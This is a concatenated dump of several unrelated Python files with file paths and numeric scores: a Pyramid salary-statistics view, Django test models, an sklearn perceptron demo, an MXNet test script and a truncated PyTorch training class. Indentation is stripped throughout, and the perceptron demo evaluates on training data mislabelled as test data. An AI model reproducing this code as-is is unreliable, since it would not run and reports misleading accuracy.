p.xgrid.grid_line_color = None
p.legend.orientation = "horizontal"
p.legend.location = "top_center"
# End of unrendered tracking above.
lang = [
'./mass_scraper/pythonresults.csv',
'./mass_scraper/javascriptresults.csv',
'./mass_scraper/csharpresults.csv',
'./mass_scraper/javaresults.csv',
'./mass_scraper/phpresults.csv',
'./mass_scraper/cplusresults.csv']
lang_legend = [
'python', 'javascript', 'csharp', 'java', 'php', 'Cplus'
]
avg = []
place_count = 0
p1 = figure(
title="Salaries by Language", background_fill_color="#E8DDCB")
p1.xaxis[0].formatter.use_scientific = False
for lng in lang:
df = pd.read_csv(lng)
y = list(df[lang_legend[place_count]])
avg.append(np.mean(y))
hist, edges = np.histogram(y)
p1.quad(
top=hist,
bottom=0,
left=edges[:-1],
right=edges[1:],
fill_color=Spectral6[place_count],
fill_alpha=0.3,
line_color=Spectral6[place_count],
legend=lang_legend[place_count])
place_count += 1
p1.legend.location = "top_center"
p1.legend.click_policy = "hide"
p2 = figure(
x_range=lang_legend, y_range=(0, max(avg)), plot_height=500,
title="Average Salaries by Language")
source = ColumnDataSource(
data=dict(lang_legend=lang_legend, avg=avg))
p2.vbar(
x='lang_legend',
top='avg',
width=0.9,
legend=False,
source=source,
fill_color=factor_cmap(
'lang_legend', palette=Spectral6, factors=lang_legend))
p2.yaxis[0].formatter.use_scientific = False
job = [
'./mass_scraper/datascienceresults.csv',
'./mass_scraper/DBAresults.csv',
'./mass_scraper/softwaredevresults.csv',
'./mass_scraper/uxresults.csv',
'./mass_scraper/webdevresults.csv'
]
job_legend = ['datascience', 'dba', 'softwaredev', 'ux', 'webdev']
avg1 = []
place_count = 0
p3 = figure(
title="Salaries by Job", background_fill_color="#E8DDCB")
p3.xaxis[0].formatter.use_scientific = False
for jab in job:
df = pd.read_csv(jab)
y = list(df[job_legend[place_count]])
avg1.append(np.mean(y))
hist, edges = np.histogram(y)
p3.quad(
top=hist,
bottom=0,
left=edges[:-1],
right=edges[1:],
fill_color=Spectral5[place_count],
fill_alpha=0.3,
line_color=Spectral5[place_count],
legend=job_legend[place_count])
place_count += 1
p3.legend.location = "top_center"
p3.legend.click_policy = "hide"
p4 = figure(x_range=job_legend, y_range=(0, max(avg1)),
plot_height=500, title="Average Salaries by Job")
source = ColumnDataSource(
data=dict(job_legend=job_legend, avg1=avg1))
p4.vbar(
x='job_legend',
top='avg1',
width=0.9,
legend=False,
source=source,
fill_color=factor_cmap(
'job_legend', palette=Spectral5, factors=job_legend))
p4.yaxis[0].formatter.use_scientific = False
all_plots = gridplot([[p1, p3], [p2, p4]])
script, div = components(all_plots)
return {'script': script, 'div': div}
except AttributeError:
return HTTPUnauthorized() | opportune/views/stat.py | from pyramid.view import view_config
from pyramid.httpexceptions import HTTPUnauthorized
from ..models import Association, Account
from bokeh.models import ColumnDataSource
from bokeh.plotting import figure
from bokeh.layouts import gridplot
from bokeh.embed import components
from bokeh.palettes import Spectral6, Spectral5
from bokeh.transform import factor_cmap
import pandas as pd
import numpy as np
@view_config(route_name='stat', renderer='../templates/stat.jinja2',
request_method='GET')
def stat_view(request):
"""View statistics scraped from indeed."""
try:
query = request.dbsession.query(Account)
admin = query.filter(
Account.username == request.authenticated_userid).one_or_none()
if admin.admin is True:
# From here, down to next comment, is data we've tracked but
# decided not to render.
relationships = request.dbsession.query(Association)
count = {}
for each in relationships:
word = each.keyword_id
if word not in count:
count[word] = 1
else:
count[word] += 1
top = 1
for value in count.values():
if top <= value:
top = value * 1.5
users = list(count.values())
keywords = list(count.keys())
source = ColumnDataSource(
data=dict(keywords=keywords, users=users))
p = figure(x_range=keywords, y_range=(0, top), plot_height=500,
title="Current Stored Searches")
p.vbar(x='keywords', top='users', width=0.9, legend=False,
source=source)
p.xgrid.grid_line_color = None
p.legend.orientation = "horizontal"
p.legend.location = "top_center"
# End of unrendered tracking above.
lang = [
'./mass_scraper/pythonresults.csv',
'./mass_scraper/javascriptresults.csv',
'./mass_scraper/csharpresults.csv',
'./mass_scraper/javaresults.csv',
'./mass_scraper/phpresults.csv',
'./mass_scraper/cplusresults.csv']
lang_legend = [
'python', 'javascript', 'csharp', 'java', 'php', 'Cplus'
]
avg = []
place_count = 0
p1 = figure(
title="Salaries by Language", background_fill_color="#E8DDCB")
p1.xaxis[0].formatter.use_scientific = False
for lng in lang:
df = pd.read_csv(lng)
y = list(df[lang_legend[place_count]])
avg.append(np.mean(y))
hist, edges = np.histogram(y)
p1.quad(
top=hist,
bottom=0,
left=edges[:-1],
right=edges[1:],
fill_color=Spectral6[place_count],
fill_alpha=0.3,
line_color=Spectral6[place_count],
legend=lang_legend[place_count])
place_count += 1
p1.legend.location = "top_center"
p1.legend.click_policy = "hide"
p2 = figure(
x_range=lang_legend, y_range=(0, max(avg)), plot_height=500,
title="Average Salaries by Language")
source = ColumnDataSource(
data=dict(lang_legend=lang_legend, avg=avg))
p2.vbar(
x='lang_legend',
top='avg',
width=0.9,
legend=False,
source=source,
fill_color=factor_cmap(
'lang_legend', palette=Spectral6, factors=lang_legend))
p2.yaxis[0].formatter.use_scientific = False
job = [
'./mass_scraper/datascienceresults.csv',
'./mass_scraper/DBAresults.csv',
'./mass_scraper/softwaredevresults.csv',
'./mass_scraper/uxresults.csv',
'./mass_scraper/webdevresults.csv'
]
job_legend = ['datascience', 'dba', 'softwaredev', 'ux', 'webdev']
avg1 = []
place_count = 0
p3 = figure(
title="Salaries by Job", background_fill_color="#E8DDCB")
p3.xaxis[0].formatter.use_scientific = False
for jab in job:
df = pd.read_csv(jab)
y = list(df[job_legend[place_count]])
avg1.append(np.mean(y))
hist, edges = np.histogram(y)
p3.quad(
top=hist,
bottom=0,
left=edges[:-1],
right=edges[1:],
fill_color=Spectral5[place_count],
fill_alpha=0.3,
line_color=Spectral5[place_count],
legend=job_legend[place_count])
place_count += 1
p3.legend.location = "top_center"
p3.legend.click_policy = "hide"
p4 = figure(x_range=job_legend, y_range=(0, max(avg1)),
plot_height=500, title="Average Salaries by Job")
source = ColumnDataSource(
data=dict(job_legend=job_legend, avg1=avg1))
p4.vbar(
x='job_legend',
top='avg1',
width=0.9,
legend=False,
source=source,
fill_color=factor_cmap(
'job_legend', palette=Spectral5, factors=job_legend))
p4.yaxis[0].formatter.use_scientific = False
all_plots = gridplot([[p1, p3], [p2, p4]])
script, div = components(all_plots)
return {'script': script, 'div': div}
except AttributeError:
return HTTPUnauthorized() | 0.657098 | 0.296642 |
from django.db import models
class SampleModel(models.Model):
a = models.CharField(max_length=50, null=True)
b = models.CharField(max_length=50, null=True)
class SampleModelWithFK(models.Model):
parent = models.ForeignKey(SampleModel, on_delete=models.CASCADE)
class SampleModelForAutofilter(models.Model):
fk = models.ForeignKey(SampleModel, related_name="fk_1", on_delete=models.CASCADE)
non_indexed_fk = models.ForeignKey(SampleModel, related_name="fk_2", db_index=False, on_delete=models.CASCADE)
indexed_int = models.IntegerField(db_index=True)
non_indexed_int = models.IntegerField()
indexed_char = models.CharField(max_length=255, db_index=True)
non_indexed_char = models.CharField(max_length=255)
indexed_text = models.TextField(db_index=True)
non_indexed_text = models.TextField()
indexed_url = models.URLField(db_index=True)
non_indexed_url = models.URLField()
indexed_email = models.EmailField(db_index=True)
non_indexed_email = models.EmailField()
nullable_field = models.IntegerField(null=True, db_index=True)
unique_text = models.CharField(max_length=255, unique=True)
@property
def some_property(self):
return "property"
class ThirdLevelModelForNestedFilteringTest(models.Model):
name = models.CharField(max_length=255)
class SecondLevelModelForContextPassingTest(models.Model):
name = models.CharField(max_length=255)
third = models.ForeignKey(ThirdLevelModelForNestedFilteringTest, related_name="second", null=True,
on_delete=models.CASCADE)
class TopLevelModelForContextPassingTest(models.Model):
second = models.ForeignKey(SecondLevelModelForContextPassingTest, related_name="top", on_delete=models.CASCADE)
name = models.CharField(max_length=255)
class AutoOptimization3Model(models.Model):
name = models.CharField(max_length=255)
sample = models.ForeignKey(SampleModel, on_delete=models.CASCADE)
class AutoOptimization2Model(models.Model):
name = models.CharField(max_length=255)
fk_3_1 = models.ForeignKey(AutoOptimization3Model, related_name="reverse_2_1", on_delete=models.CASCADE)
fk_3_2 = models.ForeignKey(AutoOptimization3Model, related_name="reverse_2_2", on_delete=models.CASCADE)
sample = models.ForeignKey(SampleModel, on_delete=models.CASCADE)
class AutoOptimization1Model(models.Model):
name = models.CharField(max_length=255)
fk_2 = models.ForeignKey(AutoOptimization2Model, related_name="reverse_1", on_delete=models.CASCADE)
sample_m2m = models.ManyToManyField(SampleModel) | tests/models.py | from django.db import models
class SampleModel(models.Model):
a = models.CharField(max_length=50, null=True)
b = models.CharField(max_length=50, null=True)
class SampleModelWithFK(models.Model):
parent = models.ForeignKey(SampleModel, on_delete=models.CASCADE)
class SampleModelForAutofilter(models.Model):
fk = models.ForeignKey(SampleModel, related_name="fk_1", on_delete=models.CASCADE)
non_indexed_fk = models.ForeignKey(SampleModel, related_name="fk_2", db_index=False, on_delete=models.CASCADE)
indexed_int = models.IntegerField(db_index=True)
non_indexed_int = models.IntegerField()
indexed_char = models.CharField(max_length=255, db_index=True)
non_indexed_char = models.CharField(max_length=255)
indexed_text = models.TextField(db_index=True)
non_indexed_text = models.TextField()
indexed_url = models.URLField(db_index=True)
non_indexed_url = models.URLField()
indexed_email = models.EmailField(db_index=True)
non_indexed_email = models.EmailField()
nullable_field = models.IntegerField(null=True, db_index=True)
unique_text = models.CharField(max_length=255, unique=True)
@property
def some_property(self):
return "property"
class ThirdLevelModelForNestedFilteringTest(models.Model):
name = models.CharField(max_length=255)
class SecondLevelModelForContextPassingTest(models.Model):
name = models.CharField(max_length=255)
third = models.ForeignKey(ThirdLevelModelForNestedFilteringTest, related_name="second", null=True,
on_delete=models.CASCADE)
class TopLevelModelForContextPassingTest(models.Model):
second = models.ForeignKey(SecondLevelModelForContextPassingTest, related_name="top", on_delete=models.CASCADE)
name = models.CharField(max_length=255)
class AutoOptimization3Model(models.Model):
name = models.CharField(max_length=255)
sample = models.ForeignKey(SampleModel, on_delete=models.CASCADE)
class AutoOptimization2Model(models.Model):
name = models.CharField(max_length=255)
fk_3_1 = models.ForeignKey(AutoOptimization3Model, related_name="reverse_2_1", on_delete=models.CASCADE)
fk_3_2 = models.ForeignKey(AutoOptimization3Model, related_name="reverse_2_2", on_delete=models.CASCADE)
sample = models.ForeignKey(SampleModel, on_delete=models.CASCADE)
class AutoOptimization1Model(models.Model):
name = models.CharField(max_length=255)
fk_2 = models.ForeignKey(AutoOptimization2Model, related_name="reverse_1", on_delete=models.CASCADE)
sample_m2m = models.ManyToManyField(SampleModel) | 0.711631 | 0.214116 |
from utils import *
from sklearn.linear_model import Perceptron
from sklearn.datasets import make_classification
def test_mnist():
trX, trY, teX, teY = load_mnist()
# get 2 class data and label
train_datas = []
train_labels = []
test_datas = []
test_labels = []
for x in range(trX.shape[0]):
if trY[x] == 1.0 or trY[x]== 8.0:
train_datas.append(trX[x].flatten())
train_labels.append(trY[x])
for x in range(teX.shape[0]):
if teY[x] == 1.0 or teY[x]== 8.0:
test_datas.append(trX[x].flatten())
test_labels.append(trY[x])
print(np.array(train_datas).shape)
clf = Perceptron(penalty='l2', fit_intercept=False ,max_iter=500, shuffle=False)
clf.fit(np.array(train_datas),np.array(train_labels))
print(clf.coef_)
print(clf.intercept_)
acc = clf.score(np.array(test_datas),np.array(test_labels))
print(acc)
def test():
x,y = make_classification(n_samples=1000, n_features=2,n_redundant=0,n_informative=1,n_clusters_per_class=1)
#训练数据和测试数据
x_data_train = x[:800,:]
x_data_test = x[800:,:]
y_data_train = y[:800]
y_data_test = y[800:]
#正例和反例
positive_x1 = [x[i,0] for i in range(1000) if y[i] == 1]
positive_x2 = [x[i,1] for i in range(1000) if y[i] == 1]
negetive_x1 = [x[i,0] for i in range(1000) if y[i] == 0]
negetive_x2 = [x[i,1] for i in range(1000) if y[i] == 0]
from sklearn.linear_model import Perceptron
#定义感知机
clf = Perceptron(fit_intercept=False, max_iter=3000, shuffle=False)
#使用训练数据进行训练
clf.fit(x_data_train,y_data_train)
#得到训练结果,权重矩阵
print(clf.coef_)
#超平面的截距
print(clf.intercept_)
#利用测试数据进行验证
acc = clf.score(x_data_test,y_data_test)
print(acc)
from matplotlib import pyplot as plt
#画出正例和反例的散点图
plt.scatter(positive_x1,positive_x2,c='red')
plt.scatter(negetive_x1,negetive_x2,c='blue')
#画出超平面
line_x = np.arange(-max(positive_x1),max(positive_x1))
line_y = line_x * (-clf.coef_[0][0] / clf.coef_[0][1]) - clf.intercept_
plt.plot(line_x,line_y)
plt.show()
if __name__ == '__main__':
test_mnist()
test() | Perceptron.py | from utils import *
from sklearn.linear_model import Perceptron
from sklearn.datasets import make_classification
def test_mnist():
trX, trY, teX, teY = load_mnist()
# get 2 class data and label
train_datas = []
train_labels = []
test_datas = []
test_labels = []
for x in range(trX.shape[0]):
if trY[x] == 1.0 or trY[x]== 8.0:
train_datas.append(trX[x].flatten())
train_labels.append(trY[x])
for x in range(teX.shape[0]):
if teY[x] == 1.0 or teY[x]== 8.0:
test_datas.append(trX[x].flatten())
test_labels.append(trY[x])
print(np.array(train_datas).shape)
clf = Perceptron(penalty='l2', fit_intercept=False ,max_iter=500, shuffle=False)
clf.fit(np.array(train_datas),np.array(train_labels))
print(clf.coef_)
print(clf.intercept_)
acc = clf.score(np.array(test_datas),np.array(test_labels))
print(acc)
def test():
x,y = make_classification(n_samples=1000, n_features=2,n_redundant=0,n_informative=1,n_clusters_per_class=1)
#训练数据和测试数据
x_data_train = x[:800,:]
x_data_test = x[800:,:]
y_data_train = y[:800]
y_data_test = y[800:]
#正例和反例
positive_x1 = [x[i,0] for i in range(1000) if y[i] == 1]
positive_x2 = [x[i,1] for i in range(1000) if y[i] == 1]
negetive_x1 = [x[i,0] for i in range(1000) if y[i] == 0]
negetive_x2 = [x[i,1] for i in range(1000) if y[i] == 0]
from sklearn.linear_model import Perceptron
#定义感知机
clf = Perceptron(fit_intercept=False, max_iter=3000, shuffle=False)
#使用训练数据进行训练
clf.fit(x_data_train,y_data_train)
#得到训练结果,权重矩阵
print(clf.coef_)
#超平面的截距
print(clf.intercept_)
#利用测试数据进行验证
acc = clf.score(x_data_test,y_data_test)
print(acc)
from matplotlib import pyplot as plt
#画出正例和反例的散点图
plt.scatter(positive_x1,positive_x2,c='red')
plt.scatter(negetive_x1,negetive_x2,c='blue')
#画出超平面
line_x = np.arange(-max(positive_x1),max(positive_x1))
line_y = line_x * (-clf.coef_[0][0] / clf.coef_[0][1]) - clf.intercept_
plt.plot(line_x,line_y)
plt.show()
if __name__ == '__main__':
test_mnist()
test() | 0.45423 | 0.661363 |
import os
import argparse
import mxnet
from mxnet import gluon
from mxnet.gluon.data.vision.transforms import Compose, ToTensor, Normalize
import utils
from datahelper import MultiViewImageDataset
from model import MVRNN
def parse_args():
'''PARAMETERS'''
parser = argparse.ArgumentParser('ViewSequenceNet')
parser.add_argument('--model', type=str, default='model', help='name of the model file')
parser.add_argument('--batch_size', type=int, default=2, help='batch size')
parser.add_argument('--batch_update_period', type=int, default=64,
help='do back propagation after every 64 batches')
parser.add_argument('--gpu', type=int, nargs='+', default=(0,), help='')
parser.add_argument('--dataset_path', type=str, default='/media/zenn/files/dataset/modelnet10-multiview',
help='path to the dataset')
parser.add_argument('--checkpoint', type=str, default=None, help='location of the checkpoint')
parser.add_argument('--num_views', type=int, default=12, help='number of views')
parser.add_argument('--num_classes', type=int, default=10, help='number of classes')
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
'''initialize the network'''
ctx = [mxnet.gpu(gpu_id) for gpu_id in args.gpu]
net = MVRNN(cnn_arch='vgg11_bn', cnn_feature_length=4096, num_views=args.num_views, num_class=args.num_classes,
pretrained=True, pretrained_cnn=None, ctx=ctx)
net.load_parameters(args.checkpoint, ctx=ctx)
net.hybridize()
metric = mxnet.metric.Accuracy()
test_ds = MultiViewImageDataset(os.path.join(args.dataset_path, 'test'), args.num_views,
transform=Compose([
ToTensor(),
Normalize(mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225))]))
loader = gluon.data.DataLoader
test_data = loader(test_ds, args.batch_size, shuffle=False, last_batch='keep')
print(
'test on dataset %s, acc %s ' % (
args.dataset_path, utils.test(metric, ctx, net, test_data, num_views=args.num_views,
num_class=args.num_classes))) | test.py | import os
import argparse
import mxnet
from mxnet import gluon
from mxnet.gluon.data.vision.transforms import Compose, ToTensor, Normalize
import utils
from datahelper import MultiViewImageDataset
from model import MVRNN
def parse_args():
'''PARAMETERS'''
parser = argparse.ArgumentParser('ViewSequenceNet')
parser.add_argument('--model', type=str, default='model', help='name of the model file')
parser.add_argument('--batch_size', type=int, default=2, help='batch size')
parser.add_argument('--batch_update_period', type=int, default=64,
help='do back propagation after every 64 batches')
parser.add_argument('--gpu', type=int, nargs='+', default=(0,), help='')
parser.add_argument('--dataset_path', type=str, default='/media/zenn/files/dataset/modelnet10-multiview',
help='path to the dataset')
parser.add_argument('--checkpoint', type=str, default=None, help='location of the checkpoint')
parser.add_argument('--num_views', type=int, default=12, help='number of views')
parser.add_argument('--num_classes', type=int, default=10, help='number of classes')
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
'''initialize the network'''
ctx = [mxnet.gpu(gpu_id) for gpu_id in args.gpu]
net = MVRNN(cnn_arch='vgg11_bn', cnn_feature_length=4096, num_views=args.num_views, num_class=args.num_classes,
pretrained=True, pretrained_cnn=None, ctx=ctx)
net.load_parameters(args.checkpoint, ctx=ctx)
net.hybridize()
metric = mxnet.metric.Accuracy()
test_ds = MultiViewImageDataset(os.path.join(args.dataset_path, 'test'), args.num_views,
transform=Compose([
ToTensor(),
Normalize(mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225))]))
loader = gluon.data.DataLoader
test_data = loader(test_ds, args.batch_size, shuffle=False, last_batch='keep')
print(
'test on dataset %s, acc %s ' % (
args.dataset_path, utils.test(metric, ctx, net, test_data, num_views=args.num_views,
num_class=args.num_classes))) | 0.568536 | 0.137967 |
import os
import re
import shutil
import time
from collections import defaultdict
import torch
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
from torch.nn.utils import clip_grad_norm_
import utils
from utils import cache
class AbstractionEmbedding:
names = {
'loss': ['embed', 'abstr'],
'targets': ['embed', 'abstr'],
'outputs': ['embed', 'abstr'],
}
def __init__(self, **params):
self.params = params
for k, v in params.items():
setattr(self, k, v)
self.best_acc1 = 0
self.check_rootfolders()
self.load_checkpont()
self.logger.prepare(self)
cudnn.enabled = self.params['cudnn_enabled']
cudnn.benchmark = self.params['cudnn_benchmark']
self.criterion = {n: c.cuda() for n, c in self.criterion.items()}
print(f'Starting experiment: {self.name}')
def run(self):
if self.params['evaluate']:
return self.evaluate()
for epoch in range(self.params['start_epoch'], self.params['num_epochs'],):
# Train for one epoch
self.train(epoch)
# Evaluate on validation set
if (epoch + 1) % self.val_freq == 0 or epoch == self.num_epochs - 1:
meters = self.validate(epoch)
acc1 = meters[self.return_metric].avg
self.scheduler.step(meters['full'].avg)
# Remember best acc@1 and save checkpoint
is_best = acc1 > self.best_acc1
self.best_acc1 = max(acc1, self.best_acc1)
self.save_checkpoint(
{
'epoch': epoch + 1,
# 'params': self.params,
# 'arch': self.model.module.arch,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
'best_acc1': self.best_acc1,
},
is_best,
)
def train(self, epoch):
# Switch to train mode
self.model.train()
# self.meters = self.get_meters(self.__class__.__name__)
self.meters = self.logger.get_progress_meter(
epoch, len(self.dataloader['train'])
)
end = time.time()
for i, (input, target) in enumerate(self.dataloader['train']):
# Measure data loading time
self.meters['data_time'].update(time.time() - end)
# Step the experiment
self.step(input, target)
# Measure elapsed time
self.meters['batch_time'].update(time.time() - end)
end = time.time()
if i % self.params['log_freq'] == 0:
self.logger.log(i, mode='train', epoch=epoch)
if i % self.params['checkpoint_freq'] == 0:
self.save_checkpoint(
{
'epoch': epoch + 1,
# 'params': self.params,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
'best_acc1': self.best_acc1,
},
False,
)
if self.params['max_step'] is not None:
if i % self.params['max_step'] == 0:
break
def validate(self, epoch, evaluate=False):
# Switch to evaluate mode
self.model.eval()
self.meters = self.logger.get_progress_meter(epoch, len(self.dataloader['val']))
if evaluate:
self.probs = defaultdict(list)
self.preds = defaultdict(list)
self.outputs = defaultdict(list)
self.targets = defaultdict(list)
with torch.no_grad():
end = time.time()
for i, (input, target) in enumerate(self.dataloader['val']):
self.meters['data_time'].update(time.time() - end)
mode = 'eval' if evaluate else 'val'
# Step the model
self.step(input, target, mode=mode)
# Measure elapsed time
self.meters['batch_time'].update(time.time() - end)
end = time.time()
if i % self.params['log_freq'] == 0:
self.logger.log(i, mode=mode)
if self.params['max_step'] is not None:
if i % self.params['max_step'] == 0:
self.logger.write('Max steps reached!', 'main')
break
if not evaluate:
msg = self.logger.log_val()
self.logger.write(msg, 'main')
self.logger.write(msg, 'val')
else:
msg = self.logger.log_eval()
self.logger.write(msg, 'summary')
return self.meters
def step(self, input, target, mode='train'):
input = self.input_transform(input, mode=mode)
targets = self.target_transform(target, mode=mode)
# Compute output => [batch_size, out_size, num_inputs]
outputs = dict(zip(self.names['outputs'], self.model(input)))
outputs = self.output_transform(outputs, mode=mode)
# Compute loss
loss = {
name: self.loss_weights[name]
* self.criterion[name](outputs[name], targets[name])
for name in self.names['outputs']
}
loss['full'] = sum(loss.values())
for name, value in loss.items():
self.meters[name].update(value.item(), self.batch_size)
# Measure metrics
acc1, acc5 = utils.accuracy(outputs['abstr'], targets['abstr'], topk=(1, 5))
self.meters['top1@abstr'].update(acc1.item(), self.batch_size)
self.meters['top5@abstr'].update(acc5.item(), self.batch_size)
inds = {
1: (0, 4),
2: (4, 10),
3: (10, 14),
4: (14, 15),
}
inds = {k: v for k, v in inds.items() if k >= min(self.scales)}
for scale, (start_idx, stop_idx) in inds.items():
acc1, acc5 = utils.accuracy(
outputs['abstr'][..., start_idx:stop_idx],
targets['abstr'][..., start_idx:stop_idx],
topk=(1, 5),
)
self.meters[f'top1@abstr_{scale}'].update(acc1.item(), self.batch_size)
self.meters[f'top5@abstr_{scale}'].update(acc5.item(), self.batch_size)
if mode == 'train':
# Compute gradient and do SGD step
self.optimizer.zero_grad()
loss['full'].backward()
# Clip gradients
if self.params['clip_gradient'] is not None:
clip_gradient = self.params['clip_gradient']
total_norm = clip_grad_norm_(self.model.parameters(), clip_gradient)
if total_norm > clip_gradient:
print(
f'clipping gradient: {total_norm:.4f} with coef {(clip_gradient/total_norm):.4f}'
)
# Update weights
self.optimizer.step()
elif mode == 'eval':
for name in self.names['outputs']:
probs, preds = F.softmax(outputs[name], 1).sort(1, True)
self.probs[name].append(probs.detach().cpu())
self.preds[name].append(preds.detach().cpu())
self.targets[name].append(targets[name].detach().cpu())
self.outputs[name].append(outputs[name].detach().cpu())
def target_transform(self, target, mode='train'):
targets = {}
min_scale = min(self.scales)
offset = {1: 0, 2: 4, 3: 10, 4: 15}.get(min_scale)
for name, tgt in zip(self.names['targets'], target):
targets[name] = tgt.cuda(non_blocking=True)[:, offset:]
self.batch_size = tgt.size(0)
return targets
def input_transform(self, input, mode='train'):
return input
def output_transform(self, output, mode='train'):
return output
@cache
def name(self):
name = '_'.join(
map(
str,
[
self.__class__.__name__,
self.exp_id,
self.params['dataset_name'],
self.params['basemodel_name'],
'-'.join(map(str, self.param_names['loss_weights'])),
'-'.join(map(str, self.param_names['criterion'])),
'-'.join(map(str, [self.param_names['optimizer'], self.lr])),
self._model.name,
],
)
)
name = self.params['resume'] or name
name = re.sub(r'_(checkpoint|best).pth.tar$', '', name)
name = self.params['prefix'] + name.split('/')[-1]
name = type(self).__name__ + '_' + '_'.join(name.split('_')[1:])
return name
def check_rootfolders(self):
"""Create log and model folder."""
folders_util = [
self.params['log_dir'],
self.params['output_dir'],
self.params['metadata_dir'],
self.params['checkpoint_dir'],
]
for folder in folders_util:
os.makedirs(folder, exist_ok=True)
def save_name(self, save_type='EVAL', mode='val', format='torch'):
ext = {'torch': '.pth', 'pickle': '.pkl', 'npz': '.npz'}.get(format, '')
name = '_'.join(
map(
str,
[
save_type.upper(),
mode.upper(),
'-'.join(self.attrs),
'-'.join(map(str, self.set_maxmin)),
self.name,
],
)
)
return self.params['prefix'] + name + ext
def save_checkpoint(self, state, is_best, filename='checkpoint.pth.tar', freq=5):
checkpoint_dir = os.path.join(
self.params['checkpoint_dir'],
self.__class__.__name__,
'_'.join([type(self._model).__name__]),
)
# type(self._model.model).__name__]))
os.makedirs(checkpoint_dir, exist_ok=True)
checkpoint_file = os.path.join(
checkpoint_dir, f'{self.name}_checkpoint.pth.tar'
)
best_file = checkpoint_file.replace('checkpoint.pth.tar', 'best.pth.tar')
epoch_file = checkpoint_file.replace(
'checkpoint.pth.tar', f'epoch_{state["epoch"]}.pth.tar'
)
# torch.save(state, checkpoint_file, pickle_protocol=4)
torch.save(state, checkpoint_file)
if is_best:
shutil.copyfile(checkpoint_file, best_file)
elif state['epoch'] % freq == 0:
shutil.copyfile(checkpoint_file, epoch_file)
def load_checkpont(self):
if self.params['resume'] is None:
self.params['checkpoint'] = None
return
file = self.params['resume']
if os.path.exists(file):
print(("=> loading checkpoint '{}'".format(file)))
checkpoint = torch.load(file)
self.params['start_epoch'] = checkpoint['epoch']
self.best_acc1 = checkpoint['best_acc1']
self.model.load_state_dict(checkpoint['state_dict'])
try:
self.optimizer.load_state_dict(checkpoint['optimizer'])
except (KeyError, AttributeError):
pass
else:
print(
(
"=> loaded checkpoint '{}' (epoch {})".format(
file, checkpoint['epoch']
)
)
)
print(f'Best Acc@1: {self.best_acc1:.3f}')
torch.cuda.empty_cache()
else:
print(("=> no checkpoint found at '{}'".format(file)))
@cache
def save_prefix(self):
return os.path.join(
self.__class__.__name__,
'_'.join([type(self._model).__name__, type(self._model.model).__name__]),
) | experiments.py | import os
import re
import shutil
import time
from collections import defaultdict
import torch
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
from torch.nn.utils import clip_grad_norm_
import utils
from utils import cache
class AbstractionEmbedding:
names = {
'loss': ['embed', 'abstr'],
'targets': ['embed', 'abstr'],
'outputs': ['embed', 'abstr'],
}
def __init__(self, **params):
self.params = params
for k, v in params.items():
setattr(self, k, v)
self.best_acc1 = 0
self.check_rootfolders()
self.load_checkpont()
self.logger.prepare(self)
cudnn.enabled = self.params['cudnn_enabled']
cudnn.benchmark = self.params['cudnn_benchmark']
self.criterion = {n: c.cuda() for n, c in self.criterion.items()}
print(f'Starting experiment: {self.name}')
def run(self):
if self.params['evaluate']:
return self.evaluate()
for epoch in range(self.params['start_epoch'], self.params['num_epochs'],):
# Train for one epoch
self.train(epoch)
# Evaluate on validation set
if (epoch + 1) % self.val_freq == 0 or epoch == self.num_epochs - 1:
meters = self.validate(epoch)
acc1 = meters[self.return_metric].avg
self.scheduler.step(meters['full'].avg)
# Remember best acc@1 and save checkpoint
is_best = acc1 > self.best_acc1
self.best_acc1 = max(acc1, self.best_acc1)
self.save_checkpoint(
{
'epoch': epoch + 1,
# 'params': self.params,
# 'arch': self.model.module.arch,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
'best_acc1': self.best_acc1,
},
is_best,
)
def train(self, epoch):
# Switch to train mode
self.model.train()
# self.meters = self.get_meters(self.__class__.__name__)
self.meters = self.logger.get_progress_meter(
epoch, len(self.dataloader['train'])
)
end = time.time()
for i, (input, target) in enumerate(self.dataloader['train']):
# Measure data loading time
self.meters['data_time'].update(time.time() - end)
# Step the experiment
self.step(input, target)
# Measure elapsed time
self.meters['batch_time'].update(time.time() - end)
end = time.time()
if i % self.params['log_freq'] == 0:
self.logger.log(i, mode='train', epoch=epoch)
if i % self.params['checkpoint_freq'] == 0:
self.save_checkpoint(
{
'epoch': epoch + 1,
# 'params': self.params,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
'best_acc1': self.best_acc1,
},
False,
)
if self.params['max_step'] is not None:
if i % self.params['max_step'] == 0:
break
def validate(self, epoch, evaluate=False):
# Switch to evaluate mode
self.model.eval()
self.meters = self.logger.get_progress_meter(epoch, len(self.dataloader['val']))
if evaluate:
self.probs = defaultdict(list)
self.preds = defaultdict(list)
self.outputs = defaultdict(list)
self.targets = defaultdict(list)
with torch.no_grad():
end = time.time()
for i, (input, target) in enumerate(self.dataloader['val']):
self.meters['data_time'].update(time.time() - end)
mode = 'eval' if evaluate else 'val'
# Step the model
self.step(input, target, mode=mode)
# Measure elapsed time
self.meters['batch_time'].update(time.time() - end)
end = time.time()
if i % self.params['log_freq'] == 0:
self.logger.log(i, mode=mode)
if self.params['max_step'] is not None:
if i % self.params['max_step'] == 0:
self.logger.write('Max steps reached!', 'main')
break
if not evaluate:
msg = self.logger.log_val()
self.logger.write(msg, 'main')
self.logger.write(msg, 'val')
else:
msg = self.logger.log_eval()
self.logger.write(msg, 'summary')
return self.meters
def step(self, input, target, mode='train'):
input = self.input_transform(input, mode=mode)
targets = self.target_transform(target, mode=mode)
# Compute output => [batch_size, out_size, num_inputs]
outputs = dict(zip(self.names['outputs'], self.model(input)))
outputs = self.output_transform(outputs, mode=mode)
# Compute loss
loss = {
name: self.loss_weights[name]
* self.criterion[name](outputs[name], targets[name])
for name in self.names['outputs']
}
loss['full'] = sum(loss.values())
for name, value in loss.items():
self.meters[name].update(value.item(), self.batch_size)
# Measure metrics
acc1, acc5 = utils.accuracy(outputs['abstr'], targets['abstr'], topk=(1, 5))
self.meters['top1@abstr'].update(acc1.item(), self.batch_size)
self.meters['top5@abstr'].update(acc5.item(), self.batch_size)
inds = {
1: (0, 4),
2: (4, 10),
3: (10, 14),
4: (14, 15),
}
